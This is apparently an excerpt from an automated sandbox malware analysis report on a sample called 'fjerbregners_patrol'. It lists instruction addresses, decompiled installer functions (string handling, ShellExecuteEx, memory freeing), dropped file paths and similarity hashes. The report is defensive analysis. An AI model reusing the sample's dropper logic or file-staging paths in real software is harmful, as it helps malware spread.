                                                                                                                                                                                            0x6ee81c6e
                                                                                                                                                                                            0x6ee81c70
                                                                                                                                                                                            0x6ee81c77
                                                                                                                                                                                            0x6ee81cad
                                                                                                                                                                                            0x6ee81cad
                                                                                                                                                                                            0x6ee81cb1
                                                                                                                                                                                            0x6ee81cb5
                                                                                                                                                                                            0x6ee81cb5
                                                                                                                                                                                            0x6ee81cb8
                                                                                                                                                                                            0x6ee81cbb
                                                                                                                                                                                            0x6ee81da3
                                                                                                                                                                                            0x6ee81da3
                                                                                                                                                                                            0x6ee81da6
                                                                                                                                                                                            0x6ee81e3b
                                                                                                                                                                                            0x6ee81e3f
                                                                                                                                                                                            0x6ee81e55
                                                                                                                                                                                            0x6ee81e57
                                                                                                                                                                                            0x6ee81d1a
                                                                                                                                                                                            0x6ee81d1a
                                                                                                                                                                                            0x6ee81d1d
                                                                                                                                                                                            0x6ee81d23
                                                                                                                                                                                            0x6ee81d27
                                                                                                                                                                                            0x6ee81d2b
                                                                                                                                                                                            0x6ee81d2f
                                                                                                                                                                                            0x6ee81d30
                                                                                                                                                                                            0x6ee81d31
                                                                                                                                                                                            0x6ee81d32
                                                                                                                                                                                            0x6ee81d3c
                                                                                                                                                                                            0x6ee81d4e
                                                                                                                                                                                            0x6ee81d5a
                                                                                                                                                                                            0x6ee81d5a
                                                                                                                                                                                            0x6ee81e5d
                                                                                                                                                                                            0x6ee81e67
                                                                                                                                                                                            0x6ee81e69
                                                                                                                                                                                            0x6ee81e6a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81e6a
                                                                                                                                                                                            0x6ee81e5f
                                                                                                                                                                                            0x6ee81e61
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81e61
                                                                                                                                                                                            0x6ee81e43
                                                                                                                                                                                            0x6ee81e45
                                                                                                                                                                                            0x6ee81e47
                                                                                                                                                                                            0x6ee81e4c
                                                                                                                                                                                            0x6ee81e4c
                                                                                                                                                                                            0x6ee81e4e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81e4e
                                                                                                                                                                                            0x6ee81dac
                                                                                                                                                                                            0x6ee81dac
                                                                                                                                                                                            0x6ee81daf
                                                                                                                                                                                            0x6ee81e2c
                                                                                                                                                                                            0x6ee81e2e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81e34
                                                                                                                                                                                            0x6ee81d63
                                                                                                                                                                                            0x6ee81d63
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81d65
                                                                                                                                                                                            0x6ee81db1
                                                                                                                                                                                            0x6ee81db1
                                                                                                                                                                                            0x6ee81db4
                                                                                                                                                                                            0x6ee81df8
                                                                                                                                                                                            0x6ee81dfc
                                                                                                                                                                                            0x6ee81e18
                                                                                                                                                                                            0x6ee81e1a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81e20
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81e22
                                                                                                                                                                                            0x6ee81e24
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81e2a
                                                                                                                                                                                            0x6ee81dfe
                                                                                                                                                                                            0x6ee81e02
                                                                                                                                                                                            0x6ee81e04
                                                                                                                                                                                            0x6ee81e06
                                                                                                                                                                                            0x6ee81e08
                                                                                                                                                                                            0x6ee81e11
                                                                                                                                                                                            0x6ee81e0a
                                                                                                                                                                                            0x6ee81e0a
                                                                                                                                                                                            0x6ee81e0a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81e08
                                                                                                                                                                                            0x6ee81db6
                                                                                                                                                                                            0x6ee81db6
                                                                                                                                                                                            0x6ee81db9
                                                                                                                                                                                            0x6ee81def
                                                                                                                                                                                            0x6ee81df1
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81df1
                                                                                                                                                                                            0x6ee81dbb
                                                                                                                                                                                            0x6ee81dbb
                                                                                                                                                                                            0x6ee81dbe
                                                                                                                                                                                            0x6ee81dd3
                                                                                                                                                                                            0x6ee81dd7
                                                                                                                                                                                            0x6ee81de6
                                                                                                                                                                                            0x6ee81de8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81de8
                                                                                                                                                                                            0x6ee81dd9
                                                                                                                                                                                            0x6ee81ddb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81d12
                                                                                                                                                                                            0x6ee81d12
                                                                                                                                                                                            0x6ee81d14
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81d14
                                                                                                                                                                                            0x6ee81dc1
                                                                                                                                                                                            0x6ee81dc4
                                                                                                                                                                                            0x6ee81dca
                                                                                                                                                                                            0x6ee81dcc
                                                                                                                                                                                            0x6ee81dcc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81dc4
                                                                                                                                                                                            0x6ee81cc1
                                                                                                                                                                                            0x6ee81d6a
                                                                                                                                                                                            0x6ee81d6c
                                                                                                                                                                                            0x6ee81d6e
                                                                                                                                                                                            0x6ee81d87
                                                                                                                                                                                            0x6ee81d88
                                                                                                                                                                                            0x6ee81d89
                                                                                                                                                                                            0x6ee81d8a
                                                                                                                                                                                            0x6ee81d8b
                                                                                                                                                                                            0x6ee81d90
                                                                                                                                                                                            0x6ee81d92
                                                                                                                                                                                            0x6ee81d94
                                                                                                                                                                                            0x6ee81d70
                                                                                                                                                                                            0x6ee81d70
                                                                                                                                                                                            0x6ee81d73
                                                                                                                                                                                            0x6ee81d75
                                                                                                                                                                                            0x6ee81d7b
                                                                                                                                                                                            0x6ee81d7d
                                                                                                                                                                                            0x6ee81d81
                                                                                                                                                                                            0x6ee81d81
                                                                                                                                                                                            0x6ee81d96
                                                                                                                                                                                            0x6ee81d9b
                                                                                                                                                                                            0x6ee81d9d
                                                                                                                                                                                            0x6ee81d9f
                                                                                                                                                                                            0x6ee81d9f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81d9b
                                                                                                                                                                                            0x6ee81cc7
                                                                                                                                                                                            0x6ee81cca
                                                                                                                                                                                            0x6ee81d61
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81d61
                                                                                                                                                                                            0x6ee81cd0
                                                                                                                                                                                            0x6ee81cd3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81cd9
                                                                                                                                                                                            0x6ee81cdc
                                                                                                                                                                                            0x6ee81d08
                                                                                                                                                                                            0x6ee81d0c
                                                                                                                                                                                            0x6ee81d5b
                                                                                                                                                                                            0x6ee81d5d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81d5d
                                                                                                                                                                                            0x6ee81d0e
                                                                                                                                                                                            0x6ee81d10
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81d10
                                                                                                                                                                                            0x6ee81cde
                                                                                                                                                                                            0x6ee81ce1
                                                                                                                                                                                            0x6ee81cfe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81ce3
                                                                                                                                                                                            0x6ee81ce3
                                                                                                                                                                                            0x6ee81ce6
                                                                                                                                                                                            0x6ee81cf4
                                                                                                                                                                                            0x6ee81cf6
                                                                                                                                                                                            0x6ee81ce8
                                                                                                                                                                                            0x6ee81cec
                                                                                                                                                                                            0x6ee81cee
                                                                                                                                                                                            0x6ee81cf0
                                                                                                                                                                                            0x6ee81cf0
                                                                                                                                                                                            0x6ee81cec
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81ce6
                                                                                                                                                                                            0x6ee81ce1
                                                                                                                                                                                            0x6ee81c79
                                                                                                                                                                                            0x6ee81c80
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81c82
                                                                                                                                                                                            0x6ee81c87
                                                                                                                                                                                            0x6ee81c89
                                                                                                                                                                                            0x6ee81c91
                                                                                                                                                                                            0x6ee81c93
                                                                                                                                                                                            0x6ee81c97
                                                                                                                                                                                            0x6ee81c9d
                                                                                                                                                                                            0x6ee81ca1
                                                                                                                                                                                            0x6ee81ca5
                                                                                                                                                                                            0x6ee81ca7
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x6ee81ca7

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE81C97
                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 6EE81D4E
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6EE81D51
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                            • API String ID: 2979337801-2043925204
                                                                                                                                                                                            • Opcode ID: e136a078febde51c8d33d2096909bd70abdb0a229cbaf200c2bf21203f1b6383
                                                                                                                                                                                            • Instruction ID: 6481582fdfe4b88af088478036851706398f2ef088e2a5bc082126246c1c9315
                                                                                                                                                                                            • Opcode Fuzzy Hash: e136a078febde51c8d33d2096909bd70abdb0a229cbaf200c2bf21203f1b6383
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C51EA719287874FD3509EF984A472B77E9AB8B20AF350A1DE5BC83344D791D84E8253
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0040202F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 52%
                                                                                                                                                                                            			E0040202F(signed char _a28, intOrPtr _a32, char _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, char* _a84, signed char _a88, void* _a108, void* _a112) {
				intOrPtr _v4;
				void* _v12;
				intOrPtr _t19;
				void* _t33;
				void* _t36;
				void* _t37;

				_t33 = E00402E92(_t36);
				_t19 = E00402E92(_t36);
				_t37 = E00402E92(_t36, 0x22);
				E00402E92(_t36, 0x15);
				_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
				_push(0xffffffec);
				E00405BA4();
				_a68 = _v4;
				_a64 = _a32;
				_a88 = _a28;
				_a76 = _t19;
				_t25 =  !=  ? _t33 : 0;
				_a72 =  !=  ? _t33 : 0;
				_a84 = "C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne\\Vrvleversenes\\lsernes\\Volantly";
				_t27 =  !=  ? _t37 : 0;
				_a80 =  !=  ? _t37 : 0;
				if(E004067EE( &_a60) != 0) {
					if((_a88 & 0x00000040) != 0) {
						E00406304(__ecx,  *((intOrPtr*)(__esp + 0x8c)));
						_push( *((intOrPtr*)(__esp + 0x8c)));
						CloseHandle();
					}
				}
				 *0x4240c8 =  *0x4240c8 + 1;
				return 0;
			}









                                                                                                                                                                                            0x00402037
                                                                                                                                                                                            0x00402039
                                                                                                                                                                                            0x00402049
                                                                                                                                                                                            0x0040204b
                                                                                                                                                                                            0x00402050
                                                                                                                                                                                            0x00402055
                                                                                                                                                                                            0x00402057
                                                                                                                                                                                            0x00402064
                                                                                                                                                                                            0x0040206a
                                                                                                                                                                                            0x00402072
                                                                                                                                                                                            0x00402078
                                                                                                                                                                                            0x0040207c
                                                                                                                                                                                            0x0040207f
                                                                                                                                                                                            0x00402087
                                                                                                                                                                                            0x0040208f
                                                                                                                                                                                            0x00402092
                                                                                                                                                                                            0x004020a2
                                                                                                                                                                                            0x004020ad
                                                                                                                                                                                            0x004020ba
                                                                                                                                                                                            0x004020bf
                                                                                                                                                                                            0x004020c6
                                                                                                                                                                                            0x004020c6
                                                                                                                                                                                            0x00402cfc
                                                                                                                                                                                            0x00402d00
                                                                                                                                                                                            0x00402d12

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405BD9
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrlenA.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405BE9
                                                                                                                                                                                              • Part of subcall function 00405BA4: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,00000000,C:\Users\user\Desktop,?,00000000), ref: 00405C02
                                                                                                                                                                                              • Part of subcall function 00405BA4: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll), ref: 00405C1D
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32 ref: 00405C47
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32(000203D0,00001007,00000000,?), ref: 00405C64
                                                                                                                                                                                              • Part of subcall function 00405BA4: SendMessageA.USER32(000203D0,00001013,00000000,00000000), ref: 00405C72
                                                                                                                                                                                              • Part of subcall function 004067EE: ShellExecuteExA.SHELL32(?,004020A0,?), ref: 004067FD
                                                                                                                                                                                              • Part of subcall function 00406304: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040630E
                                                                                                                                                                                              • Part of subcall function 00406304: GetExitCodeProcess.KERNEL32(?,?), ref: 00406338
                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?), ref: 004020C6
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • @, xrefs: 004020A8
                                                                                                                                                                                            • C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly, xrefs: 00402087
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll, xrefs: 00402050
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                                                                                                                                                                            • String ID: @$C:\Users\user\AppData\Local\Temp\nsm8742.tmp\System.dll$C:\Users\user\AppData\Roaming\drvelens\anskrevne\Vrvleversenes\lsernes\Volantly
                                                                                                                                                                                            • API String ID: 4079680657-2061191803
                                                                                                                                                                                            • Opcode ID: 12f489d276a69f2d57e1c3b9e679836e0b468162d68d86f7b76ca5af2db11577
                                                                                                                                                                                            • Instruction ID: 6a11b1f8f021fa4b5685332c3b9c4fc481d3e8082e25611fed3f2b653162e4a9
                                                                                                                                                                                            • Opcode Fuzzy Hash: 12f489d276a69f2d57e1c3b9e679836e0b468162d68d86f7b76ca5af2db11577
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F115B71648390ABD710EF75D94460ABBE0AF84304F10883FF981E72D1DAB8C805CB1A
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406926 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 44stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                            			E00406926(char _a4, CHAR* _a8) {
				intOrPtr* _v4;
				intOrPtr _v16;
				int _t12;
				void* _t16;
				int _t19;
				intOrPtr* _t21;
				int _t22;
				CHAR* _t23;

				_t12 = lstrlenA(_a8);
				_t2 =  &_a4; // 0x406258
				_t23 =  *_t2;
				_t22 = _t12;
				if(lstrlenA(_t23) < _t22) {
					L4:
					return 0;
				}
				_t21 = lstrcmpiA;
				_v4 = lstrcmpiA;
				_a4 = CharNextA;
				while(1) {
					_t23[_t22] = 0;
					_t16 =  *_t21(_t23, _a8);
					if(_t16 == 0) {
						break;
					}
					_t23 = _v4(_t23);
					_t19 = lstrlenA(_t23);
					_t21 = _v16;
					if(_t19 >= _t22) {
						continue;
					}
					goto L4;
				}
				return _t23;
			}











                                                                                                                                                                                            0x00406936
                                                                                                                                                                                            0x00406938
                                                                                                                                                                                            0x00406938
                                                                                                                                                                                            0x0040693c
                                                                                                                                                                                            0x00406943
                                                                                                                                                                                            0x0040697f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040697f
                                                                                                                                                                                            0x00406945
                                                                                                                                                                                            0x00406950
                                                                                                                                                                                            0x00406954
                                                                                                                                                                                            0x00406958
                                                                                                                                                                                            0x00406960
                                                                                                                                                                                            0x00406964
                                                                                                                                                                                            0x0040696b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406972
                                                                                                                                                                                            0x00406975
                                                                                                                                                                                            0x00406977
                                                                                                                                                                                            0x0040697d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040697d
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00406258,00000000,[Rename],00000000,00000000,00000000), ref: 00406936
                                                                                                                                                                                            • lstrlenA.KERNEL32(Xb@,?,00406258,00000000,[Rename],00000000,00000000,00000000), ref: 0040693F
                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00406258,00000000,[Rename],00000000,00000000,00000000), ref: 00406975
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: lstrlen
                                                                                                                                                                                            • String ID: Xb@
                                                                                                                                                                                            • API String ID: 1659193697-3170496175
                                                                                                                                                                                            • Opcode ID: 57abf381afc751502f69bd04b03984bb40503a06b22e639990fe9b1debca6ded
                                                                                                                                                                                            • Instruction ID: 375031dede342ce3d0e7988aaff1c67288018bd81a4bacf9706d6e5a8ec8e971
                                                                                                                                                                                            • Opcode Fuzzy Hash: 57abf381afc751502f69bd04b03984bb40503a06b22e639990fe9b1debca6ded
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DF0AD76209A52AFC2019B289C0082BFBD8AF95350B64082EF885D3340CB30E81587BA
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004069B5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004069B5(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				char _t10;
				CHAR* _t11;
				CHAR* _t12;
				void* _t13;

				_t11 = _a4;
				_t12 = CharNextA(_t11);
				_t5 = CharNextA(_t12);
				_t10 =  *_t11;
				if(_t10 == 0) {
					L10:
					return 0;
				}
				if( *_t12 != 0x3a || _t12[1] != 0x5c) {
					if(_t10 == 0x5c && _t11[1] == _t10) {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E004063E4(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
					}
					goto L10;
				} else {
					return CharNextA(_t5);
				}
			}









                                                                                                                                                                                            0x004069be
                                                                                                                                                                                            0x004069c5
                                                                                                                                                                                            0x004069c8
                                                                                                                                                                                            0x004069ca
                                                                                                                                                                                            0x004069ce
                                                                                                                                                                                            0x00406a02
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00406a02
                                                                                                                                                                                            0x004069d3
                                                                                                                                                                                            0x004069e3
                                                                                                                                                                                            0x004069ec
                                                                                                                                                                                            0x004069ed
                                                                                                                                                                                            0x004069f0
                                                                                                                                                                                            0x004069f1
                                                                                                                                                                                            0x004069f9
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004069fb
                                                                                                                                                                                            0x004069fe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004069fe
                                                                                                                                                                                            0x004069ed
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004069db
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004069dc

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CharNextA.USER32(?,?,?,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,00406438,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,miscalculates\glemmeprocesserne\overfatigues\skuddagens.til,00000000,?,?,0040651F,?,00000000,756D3410,?), ref: 004069C3
                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 004069C8
                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 004069DC
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • miscalculates\glemmeprocesserne\overfatigues\skuddagens.til, xrefs: 004069B5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                            • String ID: miscalculates\glemmeprocesserne\overfatigues\skuddagens.til
                                                                                                                                                                                            • API String ID: 3213498283-4139271342
                                                                                                                                                                                            • Opcode ID: 5cfb4dd6ebdc79f7fa83f31a4537852a47460e62402bc89d83d76e0e2c4b1c65
                                                                                                                                                                                            • Instruction ID: ede5d02f01da5c0fdf96b156c180017dce50bcab87704dc0d9aba57bc5694496
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cfb4dd6ebdc79f7fa83f31a4537852a47460e62402bc89d83d76e0e2c4b1c65
                                                                                                                                                                                            • Instruction Fuzzy Hash: 38F02B61A047D16BF732A2280C4AB679BC89F57354F16803BD283B22C2C23C8C71C65E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 6EE81E71 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E6EE81E71(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				CHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x6ee840c4 : 0x6ee840bc;
					lstrcpyA(_t21,  ==  ? 0x6ee840c4 : 0x6ee840bc);
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
					}
					_t21 = _a8;
					wsprintfA(_t21, "callback%d", _t19);
				}
				return _t21;
			}






                                                                                                                                                                                            0x6ee81e71
                                                                                                                                                                                            0x6ee81e7c
                                                                                                                                                                                            0x6ee81eaf
                                                                                                                                                                                            0x6ee81ebf
                                                                                                                                                                                            0x6ee81ec4
                                                                                                                                                                                            0x6ee81e7e
                                                                                                                                                                                            0x6ee81e88
                                                                                                                                                                                            0x6ee81e8e
                                                                                                                                                                                            0x6ee81e96
                                                                                                                                                                                            0x6ee81e96
                                                                                                                                                                                            0x6ee81e99
                                                                                                                                                                                            0x6ee81ea4
                                                                                                                                                                                            0x6ee81eaa
                                                                                                                                                                                            0x6ee81ecd

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • wsprintfA.USER32 ref: 6EE81EA4
                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,error,00000818,6EE816E5,00000000,?), ref: 6EE81EC4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3719184787.000000006EE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EE80000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3719111901.000000006EE80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719267839.000000006EE84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3719390298.000000006EE86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6ee80000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: lstrcpywsprintf
                                                                                                                                                                                            • String ID: callback%d$error
                                                                                                                                                                                            • API String ID: 2408954437-1307476583
                                                                                                                                                                                            • Opcode ID: 6c5767c3e0e2858e11a20b909c2325d3403aa12360e5479d261083e85408d7f8
                                                                                                                                                                                            • Instruction ID: 806d29de13f93169cd0d0120282dd4ba7c18e50147656db4d876045e0df71f5d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c5767c3e0e2858e11a20b909c2325d3403aa12360e5479d261083e85408d7f8
